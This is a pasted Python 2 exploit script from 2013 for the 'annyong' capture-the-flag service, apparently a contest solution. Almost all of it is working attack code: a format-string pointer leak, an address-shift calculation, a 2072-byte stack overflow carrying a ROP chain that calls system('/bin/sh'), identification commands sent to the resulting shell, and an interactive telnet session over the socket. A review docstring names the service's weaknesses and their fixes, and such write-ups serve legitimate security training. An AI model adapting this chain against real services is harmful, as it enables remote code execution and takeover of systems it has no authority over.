
annyong exploit

a guest
Jun 17th, 2013
#!/usr/bin/python
"""Solution script for the "annyong" CTF service (Python 2).

Flow, as written below:
  1. Send a printf-style positional conversion and parse the hexadecimal
     value the service sends back.
  2. Compare that value with one recorded from a reference layout to get
     the shift of the remote address space.
  3. Send one oversized line: 2072 filler bytes followed by three 64-bit
     little-endian addresses, each corrected by that shift.
  4. Send a short command line and hand the socket to an interactive
     telnet session.

Python 2 only: socket.makefile(bufsize=...) and str + struct.pack()
concatenation do not work on Python 3.

NOTE(review): the two weaknesses this relies on are in the service, not
in this file -- presumably user input used directly as a format string
and an unbounded line copy into a stack buffer. The padding carries no
canary value, so the target was presumably built without a stack
protector. The usual fixes are a constant format (printf("%s", line)),
a length-bounded read, and building with -Wformat-security and
-fstack-protector.
"""

from struct import pack
import telnetlib
import socket
import sys

addr = "annyong.shallweplayaga.me"
port = 5679

# Addresses recorded from a reference run; they are only meaningful
# together with `orig` below, which comes from that same layout.
pop_rdi_ret = 0x7ffff7a8afd1  # pop rdi; ret
bin_sh_addr = 0x7ffff7b949d1  # "/bin/sh"
system_addr = 0x7ffff7a60660  # system()
orig = 0x7ffff7ffd040         # value of the leaked slot in the reference run

# Offset from the start of the input line to the first chained address.
PADDING_LEN = 2072

s = socket.socket()
s.connect((addr, port))
# Unbuffered file wrapper so each write reaches the service immediately.
f = s.makefile('rw', bufsize=0)

# Stage 1: information leak. The reply is expected to be one line of hex.
f.write("%8$llx\n")
leak_line = f.readline()
curr = int(leak_line.strip(), 16)

# Stage 2: shift between the reference layout and the live one.
# Assumes the leaked pointer and all three targets move by the same
# amount -- TODO confirm against the target's memory map.
diff = orig - curr

# Stage 3: filler up to the saved return address, then the chain:
#   pop rdi; ret  ->  rdi = "/bin/sh"  ->  system()
chain = (pop_rdi_ret, bin_sh_addr, system_addr)
buf = "A" * PADDING_LEN + "".join(pack("<Q", entry - diff) for entry in chain)

f.write(buf + "\n")
# Marker plus a few identification commands, so the first output confirms
# that a shell is on the other end.
f.write("echo pwn;id;uname -a;ls -la\n")

# Stage 4: reuse the already-connected socket for an interactive session.
t = telnetlib.Telnet()
t.sock = s
t.interact()